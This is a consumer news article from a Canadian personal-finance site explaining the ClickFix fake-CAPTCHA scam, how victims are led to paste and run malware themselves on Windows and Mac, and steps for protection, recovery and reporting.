Jun 9, 2026
Ticking the “I’m not a robot” box is one of the most reflexive actions on the internet — a small ritual that signals you are a human. And that familiarity is exactly what cybercriminals are now taking advantage of. As Microsoft reports, a rapidly spreading scam known as ClickFix is exploiting people and their comfort with that routine to trick them into installing malware on their own devices, handing over passwords, banking credentials and access to crypto wallets — all without ever clicking a suspicious link.
And the threat is real: According to Infosecurity Magazine, ClickFix attacks surged 517% from 2024 to 2025, making it one of the fastest-growing forms of cybercrime in the world. In Canada, it can result in substantial losses: The Canadian Anti-Fraud Centre’s (CAFC) Annual Statistics Report shows it received 112,000 fraud reports in 2025, with identity theft topping the list at 8,403 reported incidents; in total, reported losses totalled $704 million.
Advertisement
Crucially, the Competition Bureau Canada estimates that only 5% to 10% of fraud incidents are ever reported, meaning the real cost is almost certainly far higher.
Tricking targets into installing malware themselves
What makes ClickFix so dangerous — and so effective — is that the target is tricked into doing all the work themselves. And since victims unknowingly type in the commands to install the malware themselves, antivirus systems may not recognize it as an intrusion. Once the malware is installed, cybercriminals have broad access to the device and can sell your personal information to others.
Here’s how the attack plays out on both Windows and Mac devices.
Step 1: The fake verification page
You land on a website and encounter what looks like a standard CAPTCHA prompt — “Verify you are human” or similar. What comes next reveals the scam.
A message appears claiming the CAPTCHA system has failed and that you need to follow a few quick steps to resolve the problem. You may see a button labelled “Fix It” or “How to Fix” — this is where the scam’s alternate name, ClickFix, comes from. Clicking it copies malicious code onto your clipboard. At this stage, nothing is installed yet.
Step 2: You install the malware yourself
Here is the key moment: The scammer’s page then prompts you through a set of keystrokes that paste and run that code on your own system — and once you do, the malware is live.
On a Windows computer, the sequence typically looks like this:
- Win + R (opens the Windows Run dialog)
- Ctrl + V (pastes the malicious code)
- Enter (executes the malware)
On a Mac, victims are directed to:
Advertisement
- Command + Space (opens Spotlight)
- Type “Terminal” and press Enter (opens the command-line interface)
- Command + V (pastes the malicious code)
- Return (executes the malware)
Since the victim initiates each step, conventional antivirus programs may not flag anything as suspicious. Microsoft Defender experts documented thousands of compromised devices every month by ClickFix attacks — even on machines that have enterprise-grade endpoint detection and response solutions installed.
Are you protected against the latest digital threats? Find a bank that offers real-time fraud alerts and multi-factor authentication — and keep your money safe.
Must Read
- Warren Buffett used these 4 solid, repeatable money rules to turn $9,800 into a $150B fortune. Here’s how to apply them to your own life
- Stop the leak: 5 costs Canadians (still) overpay for every single month. How many are sabotaging your 2026 budget?
- Canada is officially in a recession — and it will trigger wealth-building bargain opportunities you haven’t seen in years. Get endless commission-free ETF trades now from CIBC
Join 19,000+ readers and get Money.ca’s best stories and exclusive interviews first — clear insights curated and delivered weekly. Subscribe now.
How to protect yourself
The first and most important rule: Real CAPTCHAs will never ask you to open a command window or type in keystrokes to fix a problem. If any verification step asks you to hit a button or run commands on your computer, stop immediately and navigate away from the site.
Canada’s Get Cyber Safe national awareness campaign — run by the Communications Security Establishment (CSE) — recommends enabling multi-factor authentication (MFA) on every account you have that allows it. According to Get Cyber Safe, MFA is capable of blocking over 99.9% of account compromise attacks: Even if a cybercriminal obtains your password, they still can’t access your account without a second form of verification.
What to do if you think you’ve been caught
If you followed any of the steps on a suspicious page that prompted you to install malware, act immediately:
- Disconnect from the internet. Turn off your Wi-Fi or unplug your ethernet cable to limit the malware’s ability to transmit your data.
- Use a different, clean device to change your passwords on any important accounts including banking, email, investment platforms and social media.
- Scan your compromised device for malware while it remains offline, using a trusted antivirus program if you have one installed.
- If you don’t have antivirus software, take the device to a professional for a full security scan before reconnecting it to the internet.
- Monitor your bank and credit card accounts closely for any transactions you don’t recognize.
- Place a fraud alert on your credit report by contacting Equifax Canada or TransUnion Canada directly.
- Report the incident to the RCMP’s Report Cybercrime and Fraud portal at reportcyberandfraud.canada.ca, or contact the CAFC at 1-888-495-8501. Even if you weren’t victimized, reporting attempted scams helps law enforcement track and disrupt criminal networks.
Next steps for Canadians: building better digital habits
The ClickFix scam works because it exploits trust and routine. The best long-term defence is a combination of awareness and practical security habits. Here are the steps experts recommend:
- Enable MFA on every account that offers it. Only 53% of Canadians currently use MFA — a gap that leaves millions of accounts vulnerable.
- Keep your devices and operating systems up to date. Software updates frequently patch the security vulnerabilities that malware exploits.
- Use a reputable antivirus program and keep its definitions current.
- Bookmark the Government of Canada’s Get Cyber Safe website (getcybersafe.gc.ca) for practical, plain-language security guidance updated regularly by CSE.
- Know where to report. Bookmark the Report Cybercrime and Fraud portal (reportcyberandfraud.canada.ca) before you need it. Reporting — even an attempted scam — helps the CAFC and RCMP National Cybercrime Coordination Centre (NC3) build a national picture of threats to warn others.
- Talk to family members who may be more vulnerable. The CAFC’s Financial Literacy Report says Canadians over 60 tend to experience higher average financial losses per incident, and fraud awareness conversations within families are among the most effective prevention tools available.
-With files from Melanie Huddart
You May Also Like
- This 7-step plan from Dave Ramsey is designed to help you ditch debt, save more and build wealth — here’s how it works
- Prioritize these 4 critical investments and watch your net worth skyrocket
- Focus on these 3 ‘magic numbers’ to become a millionaire — and only on these numbers. How do you stack up?
- Millionaires under 43 are reshaping investing — just 25% of their portfolios are in stocks. Here’s where their money is going
Laura Boast is an Associate Editor with Moneywise.com and a lifelong content creator who has reached international audiences at Discovery, CBC, Blue Ant Media, Bond Brand Loyalty and more.
